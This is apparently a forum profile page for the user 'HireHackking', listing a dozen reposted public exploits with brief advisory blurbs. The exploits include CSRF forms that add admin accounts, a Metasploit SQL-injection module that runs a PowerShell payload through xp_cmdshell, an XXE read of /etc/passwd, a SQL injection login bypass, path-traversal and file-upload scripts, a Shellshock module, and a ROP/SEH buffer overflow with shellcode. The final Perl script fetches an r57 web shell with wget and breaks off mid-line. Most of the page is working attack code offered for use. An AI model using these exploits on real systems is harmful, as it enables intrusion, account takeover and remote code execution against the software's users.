Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Fortinet FortiAnalyzer - Cross-Site Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/63663/info FortiAnalyzer is prone to a cross-site request-forgery vulnerability because it fails to properly validate HTTP requests. Exploiting this issue may allow a remote attacker to perform certain unauthorized administrative actions in the context of the device running the affected application. Other attacks are also possible. Versions prior to Fortianalyzer 4.3.7 and 5.0.5 are vulnerable. <html> <body onload="CSRF.submit();"> <html> <body onload="CSRF.submit();"> <form id="csrf" action="https://www.example.com/IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog"; method="post" name="CSRF"> <input name="userId" value="user.via.cfsr"> </input> <input name="type" value="0"> </input> <input name="rserver" value=""> </input> <input name="lserver" value=""> </input> <input name="subject" value=""> </input> <input name="cacerts" value="Fortinet_CA2"> </input> <input name="password" value="123456"> </input> <input name="password_updated" value="1"> </input> <input name="confirm_pwd" value="123456"> </input> <input name="confirm_pwd_updated" value="1"> </input> <input name="host_1" value="0.0.0.0/0.0.0.0"> </input> <input name="host_2" value="255.255.255.255/255.255.255.255"> </input> <input name="host_3" value="255.255.255.255/255.255.255.255"> </input> <input name="host_4" value="255.255.255.255/255.255.255.255"> </input> <input name="host_5" value="255.255.255.255/255.255.255.255"> </input> <input name="host_6" value="255.255.255.255/255.255.255.255"> </input> <input name="host_7" value="255.255.255.255/255.255.255.255"> </input> <input name="host_8" value="255.255.255.255/255.255.255.255"> </input> <input name="host_9" value="255.255.255.255/255.255.255.255"> </input> <input name="host_10" value="255.255.255.255/255.255.255.255"> </input> <input name="host6_1" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_2" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_3" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_4" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_5" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_6" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_7" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_8" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_9" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_10" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="profile" value="Super_User"> </input> <input name="alladomRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_pack" value=""> </input> <input name="desc" value=""> </input> <input name="showForce" value="0"> </input> <input name="numhosts" value="0"> </input> <input name="numhosts6" value="3"> </input> <input name="_comp_8" value="OK"> </input> <input name="actionevent" value="new"> </input> <input name="profileId" value=""> </input> <input name="mgt" value=""> </input> <input name="dashboard" value=""> </input> <input name="dashboardmodal" value=""> </input> <input name="csrf_token" value=""> </input> </form> </body> </html>
  2. HireHackking

    SysAid Help Desk Software 14.4.32 b25 - SQL Injection (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sysaid Helpdesk Software Unauthenticated SQLi # Date: 28.11.2015 # Exploit Author: hland # Vendor Homepage: https://www.sysaid.com/ # Version: v14.4.32 b25 # Tested on: Windows 7, Windows 10 # Blog post: http://blog.blankhat.pw/2015/09/unauthenticated-sql-injection-in-sysaid.html ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'msf/core/exploit/powershell' require 'msf/core/exploit/mssql_commands' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Sysaid Helpdesk Software Unauthenticated SQLi", 'Description' => %q{ This module exploits an unauthenticated SQLi vulnerability in the Sysaid Helpdesk Free software. Because the "menu" parameter is not handled correctly, a malicious user can manipulate the SQL query, and allows arbitrary code execution under the context of 'SYSTEM' because the database runs as the SA user. This module uses a Metasploit generated Powershell payload and uses xp_cmdshell, which is activated and then deactivated after exploitation. }, 'License' => MSF_LICENSE, 'Author' => [ 'Hland', ], 'References' => [ ['CVE', 'xxxx'], ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ ['Sysaid Helpdesk <= v14.4.32 b25', {}] ], 'Privileged' => false, 'DisclosureDate' => "Aug 29 2015", 'DefaultTarget' => 0, )) register_options( [ OptPort.new('RPORT', [true, "The web application's port", 8080]), OptString.new('TARGETURI', [true, 'The base path to to the web application', '/']) ], self.class) end def check peer = "#{rhost}:#{rport}" uri = target_uri.path uri = normalize_uri(uri,"Login.jsp") print_status("#{peer} - Checking for vulnerability") res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'vars_get' => { } }) v = res.body.scan(/\<title\>SysAid Help Desk Software\<\/title\>/) if not v vprint_error("Is this even a Sysaid Help Desk?") return Exploit::CheckCode::Safe else vprint_status("Identified system as Sysaid Help Desk") return Exploit::CheckCode::Appears end return Exploit::CheckCode::Unknown end def mssql_xpcmdshell(cmd,doprint=false,opts={}) force_enable = false begin res = mssql_query("EXEC master..xp_cmdshell '#{cmd}'", doprint) #mssql_print_reply(res) if doprint return res rescue RuntimeError => e if(e.to_s =~ /xp_cmdshell disabled/) force_enable = true retry end raise e end end def exploit peer = "#{rhost}:#{rport}" uri = target_uri.path vprint_line("#{peer} - Getting a session token...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "Login.jsp"), 'vars_get' => { } }) vprint_line("#{peer} - Cookie's in the jar...") # Got a cookie, now ready to make exploiting requests if res && res.code == 200 #vprint_line("#{res.headers}") cookies = res.get_cookies #vprint_line("#{cmd_psh_payload(payload.encoded, payload_instance.arch.first)}") else vprint_line("No 200 response? I'm outta here") return end # Put together the vulnerable URI uri = normalize_uri(uri,"api","v1","menu","menu_items") # Generate powershell payload as an encoded string powershell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:encode_final_payload => true, :remove_comspec => true}) # # Inject payload and wait for shell # print_status("#{peer} - Trying to activate xp_cmdshell and exploit vulnerability") sqli = "main';exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;EXEC master..xp_cmdshell '#{powershell_payload}';--" res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'cookie' => cookies, 'vars_get' => { 'menu' => sqli, } }) # Deactivate XPCmdShell sqli = "main';exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;--" print_status("#{peer} - Deactivating xp_cmdshell to clean up after ourselves..") res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'cookie' => cookies, 'vars_get' => { 'menu' => sqli, } }) end end
  3. HireHackking

    IBM Cognos Business Intelligence - XML External Entity Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/63719/info IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. IBM Cognos Business Intelligence 10.2.1 and prior are vulnerable. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT comments ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <ob:Openbravo xmlns:ob="http://www.example.com" xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance"> <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L"> <id>C970393BDF6C43E2B030D23482D88EED</id> <comments>&xxe;</comments> </Product> </ob:Openbravo>
  4. HireHackking

    Nagios XI - 'tfPassword' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/63754/info Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Versions prior to Nagios XI 2012R2.4 are vulnerable. POST /nagiosql/index.php HTTP/1.1 Host: localhost Content-Length: 69 Origin: http://locahost User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.76 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/nagiosql/ Cookie: PHPSESSID=httj04vv2g028sbs73v9dqoqs3 tfUsername=test&tfPassword=%27%29+OR+1%3D1+limit+1%3B--+&Submit=Login
  5. HireHackking

    Limonade Framework - 'limonade.php' Local File Disclosure

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/63771/info Limonade framework is prone to a local file-disclosure vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to obtain sensitive information from local files on computers running the vulnerable application. This may aid in further attacks. Limonade framework 3.0 vulnerable; other versions may also be affected. <?php /** To prevent of time out **/ set_time_limit(0); /** Error reporting **/ error_reporting(0); /** Necessary variables **/ $url = $argv[1]; $data = $argv[2]; $needle = $argv[3]; /** Curl function with appropriate adjustments **/ function CurlPost($url='localhost',$data=array()) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE); curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,2); curl_setopt($ch,CURLOPT_HEADER,1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_TIMEOUT,50); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,$data); return curl_exec($ch); curl_close($ch); } list($param,$file) = explode(':',$data); $FilterBypassing = '....//'; for($i=0;$i<10;$i++) { $DataToPost[$param] = $FilterBypassing.$file; $response = CurlPost($url,$DataToPost); if(strstr($response,$needle)!==FALSE) { echo $response; echo "\n\nExploited successfully!\n"; echo 'Payload: ',$DataToPost[$param],"\n\n\n"; die(); } $FilterBypassing .= '....//'; } ?>
  6. HireHackking

    Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/63743/info Linux Kernel is prone to an information-disclosure vulnerability. An attacker can exploit this issue to obtain sensitive information like original MAC address; information obtained may aid in other attacks. Note: This BID was previously titled 'Atheros Wireless Drivers MAC Address Information Disclosure Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected. #!/usr/bin/python import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * import random # number of times to inject probe for one bit (combat packet loss) ATTEMPTS_PER_BIT = 6 # time to wait for ACK in seconds SNIFFTIME = 0.3 def randmac(): mac = [0] * 6 for i in xrange(6): mac[i] = random.randint(0, 256) # avoid multicast/broadcast mac mac[0] = mac[0] & 0xFE return ":".join([format(byte, '02x') for byte in mac]) def parsemac(macstr): parts = macstr.replace("-", ":").split(":") if len(parts) != 6: raise ValueError("MAC does not consist of 6 parts (separated by : or -)") return [int(byte, 16) for byte in parts] def is_ack(p): return Dot11 in p and p.type == 1 and p.subtype == 13 def find_fixed_bits(s, mac): # eventually contains the real MAC address orgmac = [0] * 6 # random MAC address, used as sender, to which the target will send an ACK srcmac = randmac() # for all the bits - FIXME: Don't consider H.O. bit of first MAC byte for i in range(6): for bit in range(8): # flip the bit at current position currbit = mac[i] & (1 << bit) mac[i] ^= (1 << bit) # convert modified mac to string strmac = ":".join([format(byte, '02x') for byte in mac]) print "Probing", strmac, "...", replied = False for attempt in range(ATTEMPTS_PER_BIT): # inject data packet to modified MAC address packet = Dot11(type="Data", subtype=4, FCfield="from-DS", addr1=strmac, addr2=srcmac, addr3=strmac) s.send(RadioTap()/packet) # Sniff air for ACK to modified MAC l = sniff(lfilter=lambda p: is_ack(p) and p.addr1 == srcmac, count=1, timeout=SNIFFTIME, opened_socket=s) # We we got an ACK, don't need to try again if len(l) == 1: replied = True break print replied # If client replied, original bit is different from the one currently set, # otherwise it's equal to original bit. if replied: orgmac[i] |= (~currbit) & (1 << bit) else: orgmac[i] |= currbit # flip bit back to original value mac[i] ^= (1 << bit) # Done, return original MAC return orgmac if __name__ == "__main__": if len(sys.argv) != 3: print "Usage:", sys.argv[0], "interface macaddr" quit(1) try: mac = parsemac(sys.argv[2]) conf.iface = sys.argv[1] random.seed() # Open up read/write socket so we don't miss the ACK L2socket = conf.L2socket s = L2socket(type=ETH_P_ALL, iface=conf.iface) # Now find the MAC orgmac = find_fixed_bits(s, mac) s.close() print "\nReal MAC address:", ":".join(format(byte, "02x") for byte in orgmac), "\n" except ValueError, e: print "Invalid MAC address:", e except socket.error, e: print "Error with provided interface:", e
  7. HireHackking

    Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass + ROP)

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python # # Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP) # Date: 29/11/2015 # Exploit Author: Knaps # Contact: @TheKnapsy # Website: http://blog.knapsy.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows 7 x64, but should work on any other Windows platform # # Notes: # - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/) # - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :) # - bad chars: '\x00' and '\x3b' # - max shellcode size allowed: 1260 bytes # import sys, socket, struct # ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy) # Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP. def create_rop_chain(): rop_gadgets = [ # Generate value of 201 in EAX 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0xFFFFFDFF, # Value of '-201' 0x100231d1, # NEG EAX # RETN [ImageLoad.dll] # Put EAX into EBX (other unneccessary stuff comes with this gadget as well...) 0x1001da09, # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] # Carry on with the ROP as generated by mona.py 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll] # Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location # used solely by the remaining part of the above gadget (it doesn't really do anything for us) 0x1001281a, # ADD ESP,4 # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] # And carry on further as generated by mona.py 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] 0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll] 0x1001d626, # XOR ESI,ESI # RETN [ImageLoad.dll] 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] 0x10013ad6, # POP EBP # RETN [ImageLoad.dll] 0x61c227fa, # & push esp # ret [sqlite3.dll] 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] # Now bunch of ugly increments... unfortunately couldn't find anything nicer :( 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x1001b4f6, # POP ECX # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] 0x100194b3, # POP EDI # RETN [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) # Check command line args if len(sys.argv) <= 1: print "Usage: python poc.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) # Offsets rop_offset = 2455 max_size = 5000 seh_offset = 4059 eax_offset = 4183 # move ESP out of the way so the shellcode doesn't corrupt itself during execution # metasm > add esp,-1500 shellcode = "\x81\xc4\x24\xfa\xff\xff" # Just as a PoC, spawn calc.exe. Replace with any other shellcode you want # (maximum size of shellcode allowed: 1260 bytes) # # msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python # Payload size: 220 bytes shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31" shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5" shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96" shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1" shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde" shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68" shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5" shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f" shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9" shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96" shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28" shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40" shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a" shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed" shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce" shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3" shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85" buffer = "A" * rop_offset # padding buffer += create_rop_chain() buffer += shellcode buffer += "A" * (seh_offset - len(buffer)) # padding buffer += "BBBB" # overwrite nSEH pointer buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll]) buffer += "A" * (eax_offset - len(buffer)) # padding buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception buffer += "A" * (max_size - len(buffer)) # padding httpreq = ( "GET /changeuser.ghp HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host:" + host + ":" + str(port) + "\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://" + host + "/\r\n" "Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n" "Conection: Keep-Alive\r\n\r\n" ) # Send payload to the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close()
  8. HireHackking

    Thomson Reuters Velocity Analytics - Remote Code Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/63880/info Thomson Reuters Velocity Analytics is prone to a vulnerability that lets attackers inject and execute arbitrary code. Successfully exploiting this issue may allow an attacker to upload and execute arbitrary code with SYSTEM privileges. Thomson Reuters Velocity Analytics 6.94 build 2995 is vulnerable; other versions may also be affected. http://www.example.com/VhttpdMgr?action=importFile&fileName={BACKDOOR}
  9. HireHackking

    Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)', 'Description' => %q{ This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI script, acessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98. }, 'Author' => 'hdm', 'References' => [ ['CVE', '2014-6271'], ['CWE', '94'], ['OSVDB', '112004'], ['EDB', '34765'], ['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'], ['URL', 'https://access.redhat.com/articles/1200223'], ['URL', 'http://seclists.org/oss-sec/2014/q3/649'] ], 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0A\x0D", 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl generic' } }, 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]], 'DefaultTarget' => 0, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Dec 01 2015' )) register_options([ Opt::RPORT(80) ], self.class) end # # CVE-2014-6271 # def cve_2014_6271(cmd) %{() { :;}; $(#{cmd}) & } end # # Check credentials # def check res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh' ) if !res vprint_error("#{peer} - No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /Boa\/(.*)/ vprint_status("#{peer} - Found Boa version #{$1}") else print_status("#{peer} - Target is not a Boa web server") return Exploit::CheckCode::Safe end if res.body.to_s.index('127.0.0.1 ping statistics') return Exploit::CheckCode::Detected else vprint_error("#{peer} - Target does not appear to be an Advantech switch") return Expoit::CheckCode::Safe end end # # Exploit # def exploit cmd = cve_2014_6271(payload.encoded) vprint_status("#{peer} - Trying to run command '#{cmd}'") res = send_request_cgi( 'method' => 'GET', 'uri' => '/cgi-bin/ping.sh', 'agent' => cmd ) end end
  10. HireHackking

    WordPress Theme Suco - 'themify-ajax.php' Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/63836/info The Suco themes for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. <?php $uploadfile="devilscream.php"; $ch = curl_init("http://127.0.0.1/wp-content/themes/suco/themify/themify-ajax.php?upload=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>
  11. HireHackking

    LevelOne WBR-3406TX Router - Cross-Site Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/63908/info LevelOne WBR-3406TX router is prone to a cross-site request-forgery vulnerability. Attackers can exploit this issue to perform certain administrative actions and gain unauthorized access to the affected device. <html> <body> <form action="http://www.example.com/cgi-bin/pass" method="POST"> <input type="hidden" name="rc" value="@" /> <input type="hidden" name="Pa" value="1234567" /> <input type="hidden" name="P1" value="1234567" /> <input type="hidden" name="rd" value="atbox" /> <input type="submit" value="Submit form" /> </form> </body> </html>
  12. HireHackking

    PHPThumb - 'PHPThumb.php' Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/64041/info phpThumb is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because it fails to properly validate file extensions before uploading them. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. Note: This BID was previously titled 'Joomla! Alphacontent Component 'phpThumb.php' Arbitrary File Upload Vulnerability'. The title and technical details have been changed to better reflect the underlying component affected. #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request; $target = $ARGV[0]; if($target eq '') { print "======================================================\n"; print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n"; print "======================================================\n"; sleep(0.8); print "Usage: perl exploit.pl <target> \n"; exit(1); } if ($target !~ /http:\/\//) { $target = "http://$target"; } #print "[*] Enter the address of your hosted TXT shell (ex: ' http://c99.gen.tr/r57.txt') => "; #$shell = <STDIN>; sleep(1); print "======================================================\n"; print " DEVILSCREAM - WWW.NEWBIE-SECURITY.OR.ID \n"; print "======================================================\n"; sleep(1.1); print "[*] Testing exploit ... \n"; sleep(1.1); $agent = LWP::UserAgent->new(); $agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1'); $shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt"; $website = 